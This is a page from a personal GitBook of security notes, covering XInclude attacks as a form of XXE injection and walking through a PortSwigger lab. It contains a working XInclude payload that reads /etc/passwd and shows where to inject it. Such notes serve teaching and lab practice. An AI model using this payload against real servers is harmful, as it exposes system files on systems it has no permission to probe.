Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  1. WebApp Security
  2. XXE Attacks

XInclude Attacks

PreviousXXE via File uploadNextBlind XXE Attacks

Last updated 2 years ago

In some applications, they receive client-submitted data, embed it on the server-side into an XML document, and then parse the document.

  • When client-submitted data is placed into a back-end SOAP request, it is then processed by the backend SOAP service

Such type of senarios, we cannot implement our XXE attack because :

  • We don't control the entire XML document and so we cannot define the DOCTYPE element

  • To bypass this client side verification, we can use XInclude

XInclude is a part of the XML specification that allows an XML document to be built from sub-documents.

We can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document

<d0p xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></d0p>

We'll need to reference the XInclude namespace and provide the path to the sensitive file

PortSwigger Exercises

This attack is kinda confusing and tough to detect it, as we aren't interacting with the server side XML API or any sort of XML documents

We get to see, we only got two parameters productID and storeID, both are set to 1. The product parameter seems to be vulnerable as we interested in checking the stocks available for the product only right ?

When we insert the above payload, in the productID parameter it gives out the contents of the /etc/passwd file within an error, The payload tells :

  • Create a reference with the XInclude namespace => http://www.w3.org/2001/XInclude

  • And provide a path to the /etc/passwd